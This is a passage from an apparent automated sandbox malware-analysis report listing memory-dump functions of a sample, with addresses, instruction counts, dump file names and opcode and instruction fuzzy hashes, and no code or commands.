                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$paq
                                                  • API String ID: 0-4101361271
                                                  • Opcode ID: a96717ed24b46bb65bfacc0455070209029fcccf602643de2e0575f058f58f42
                                                  • Instruction ID: 74a18b12622c7afd90beccf952b409c9bf92ff79d432bf7773d7c957a2313024
                                                  • Opcode Fuzzy Hash: a96717ed24b46bb65bfacc0455070209029fcccf602643de2e0575f058f58f42
                                                  • Instruction Fuzzy Hash: 3AD1E976A10114DFDB09CF98C984E59BBB2FF49314B1680A8E6099F272CB32EC52DF51
                                                  Function 05245461 Relevance: .2, Instructions: 212COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 69a0a728ec1efb7cc4883aa4fb019d1939e84d37e2a0d3a6732552dd9bd845d5
                                                  • Instruction ID: 8b634401e1f0b21c40371d812d90a6b387d17ad1c0f4f6f3ee3b025bb2b12033
                                                  • Opcode Fuzzy Hash: 69a0a728ec1efb7cc4883aa4fb019d1939e84d37e2a0d3a6732552dd9bd845d5
                                                  • Instruction Fuzzy Hash: 10716034700005DFD748EB68D891A2AB7A3FFC9224B24C55DD91A9B395CF76AC038B90
                                                  Function 05240C50 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e32ad0563162930cc0d1a12c77d52ca4baa0aac317155c690541a739ba4fd99
                                                  • Instruction ID: 49c0a91432dde029f349852d01e72e70e93ae63f069779aa780f317797999b42
                                                  • Opcode Fuzzy Hash: 2e32ad0563162930cc0d1a12c77d52ca4baa0aac317155c690541a739ba4fd99
                                                  • Instruction Fuzzy Hash: 89310E39210141DBC718EB64D4A9829B7A3FF8A264324C659EA2B4B3D5CF36EC43CF51
                                                  Function 05240C40 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c92336644a617180dc91d85ac1a5a540521f9e6cfa44ab155f7303bac2d9bb0
                                                  • Instruction ID: 93434553e51c77ab521ff8386cc20ab82fca1a7060ff7fd27d17815c3aed11e9
                                                  • Opcode Fuzzy Hash: 3c92336644a617180dc91d85ac1a5a540521f9e6cfa44ab155f7303bac2d9bb0
                                                  • Instruction Fuzzy Hash: 24311039214140DBCB18EB64D499829B7A3FF8A264324C659E96B8F3D5CB36EC43CF51
                                                  Function 051FD01C Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405192423.00000000051FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_51fd000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5b2900689b33548335e51eb52c33820a4521ff028ac7cb565cc34e017dd005d
                                                  • Instruction ID: b55b2ca684df135c5d40ac6014323d11d0236a42bf9c53c633f7f468cefdeb2d
                                                  • Opcode Fuzzy Hash: b5b2900689b33548335e51eb52c33820a4521ff028ac7cb565cc34e017dd005d
                                                  • Instruction Fuzzy Hash: 351126B19047409FDB24DF24E9C4B36BBA5FB84704F608A6DDA0A4B241C33AD447C762
                                                  Function 051FD006 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405192423.00000000051FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_51fd000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 059fa7f0680177dd9c1430e56626c750d39abf2a125e56180aa01fe67285f22c
                                                  • Instruction ID: 8880e26a98ffe8cba021239a9b40bd6625d7789c89c0d54df3c361236f16d0f5
                                                  • Opcode Fuzzy Hash: 059fa7f0680177dd9c1430e56626c750d39abf2a125e56180aa01fe67285f22c
                                                  • Instruction Fuzzy Hash: AF110AB14087C08FDB13DF24E984B25BF71FB41214F2486EAC9858B653C33E944AC762
                                                  Function 05245810 Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7974e40acf7bf2301999cf1b1fe1879aee7368249f7508648608f42fbf424e60
                                                  • Instruction ID: a73d744b9559f5523d2ec2ad43aefc281b164d3775e19072279ad16e67725375
                                                  • Opcode Fuzzy Hash: 7974e40acf7bf2301999cf1b1fe1879aee7368249f7508648608f42fbf424e60
                                                  • Instruction Fuzzy Hash: 0E119D34715001DFCB08EA68D991828BB62FFCA22032485A9E4569B395CA36DE438F50
                                                  Function 09160180 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405814608.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_9160000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c1969e9a33427122ac4c8aadefe5719182eba6116569c29cb6f21aa637a17cb
                                                  • Instruction ID: 286082e2bbb7d32ea9ab241a2f35eb1be964a021401c3df74a778ae450d26bfa
                                                  • Opcode Fuzzy Hash: 6c1969e9a33427122ac4c8aadefe5719182eba6116569c29cb6f21aa637a17cb
                                                  • Instruction Fuzzy Hash: 63E0423564E3C54FC30387659D658907FB85E4750434F00D7E184CF1B7D619AC19C762
                                                  Function 05240DF1 Relevance: .0, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03f94cd360e510143e3040decbe1231712adfe996d855a129c27287d794d3349
                                                  • Instruction ID: 2b97b90b2fad81900cebeeca9972529f0de6e6c0662f1a861b792ed9ae4d5749
                                                  • Opcode Fuzzy Hash: 03f94cd360e510143e3040decbe1231712adfe996d855a129c27287d794d3349
                                                  • Instruction Fuzzy Hash: 03C0124214E3C09EE74302643D52BE27F748B53011F4E01C7D4C9C6DA3E1094A04C371
                                                  Function 0524212B Relevance: .0, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb6e8d70afe05d60d5b0df267c0b6d1be18b0b626530249aaa1951bd9101d154
                                                  • Instruction ID: bf5300fed53ea3b2ba5f291724c8fe9cd3c050271303e1599803b8f56651d5f8
                                                  • Opcode Fuzzy Hash: fb6e8d70afe05d60d5b0df267c0b6d1be18b0b626530249aaa1951bd9101d154
                                                  • Instruction Fuzzy Hash: 58B0121232020906956820C414164A3334E8B40701E210214A20E06540480427A204BD
                                                  Function 052421AE Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8877486df801b82ce60cf2f2fc41c0e2a5664aebd4ad17d51bff964d9d6e1a40
                                                  • Instruction ID: 165c8ecb8b4a4343463968965a07db9de8a284e584415d511f35d10ff8bc432c
                                                  • Opcode Fuzzy Hash: 8877486df801b82ce60cf2f2fc41c0e2a5664aebd4ad17d51bff964d9d6e1a40
                                                  • Instruction Fuzzy Hash: 6DA0021276570C12E99C36D96419A36738E8B84955E404379A70F1BA825C4578A014BE
                                                  Function 091601A0 Relevance: .0, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405814608.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_9160000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                                  • Instruction ID: 38f246181df111d5429a8bd68a772e0fce3d181c3253e5a9de7ce3dab65c4b62
                                                  • Opcode Fuzzy Hash: 0c5aa06abd19b972ef5ffdcdd9d868785c862436591dc722b60b57511d1520ba
                                                  • Instruction Fuzzy Hash: F4B01230240208CFC300DB5DD445C003BFCAF49A0434000D0F1088B731C721FC008A40
                                                  Function 05242130 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 372ab8a0fdbf735ce3e28cc46d4b176e5ff116ffe7f95314b8db6642a0f7a683
                                                  • Instruction ID: 4174f689d7df41e905a2cad76451889f7e85d9145e0bbdb29dca80ee513d8270
                                                  • Opcode Fuzzy Hash: 372ab8a0fdbf735ce3e28cc46d4b176e5ff116ffe7f95314b8db6642a0f7a683
                                                  • Instruction Fuzzy Hash: 75A0022236430E06A54831D9642A566738E4B94B16E404165971D0B6919C457AA104BE
                                                  Function 052421B0 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 402dc5ea1651cc76c176e491f031505c8e46c6bd6839a8a393a0ebec61388e6e
                                                  • Instruction ID: eecf8363babd2db2e9bb1e8a501933bd981fa587127a1f111756864c0f07ae8d
                                                  • Opcode Fuzzy Hash: 402dc5ea1651cc76c176e491f031505c8e46c6bd6839a8a393a0ebec61388e6e
                                                  • Instruction Fuzzy Hash: 16A0021236570C02E54832D96419A36738E4B84915E404379970D0BA825C4578A004BE
                                                  Function 05240E00 Relevance: .0, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79ce71688b5efb5e13a44889c04b4dc6dda3670ed1eab74fd5bac6b5ffb2c7cb
                                                  • Instruction ID: 0c0d94559d3118f217bf452e1e46c34c7d381e8f2fd063cfebd6d963d00a0e5d
                                                  • Opcode Fuzzy Hash: 79ce71688b5efb5e13a44889c04b4dc6dda3670ed1eab74fd5bac6b5ffb2c7cb
                                                  • Instruction Fuzzy Hash: E1A02230003B0CC3EA8033E8BC0CF2033EEC388A00F000322E30E032808E02B80080A2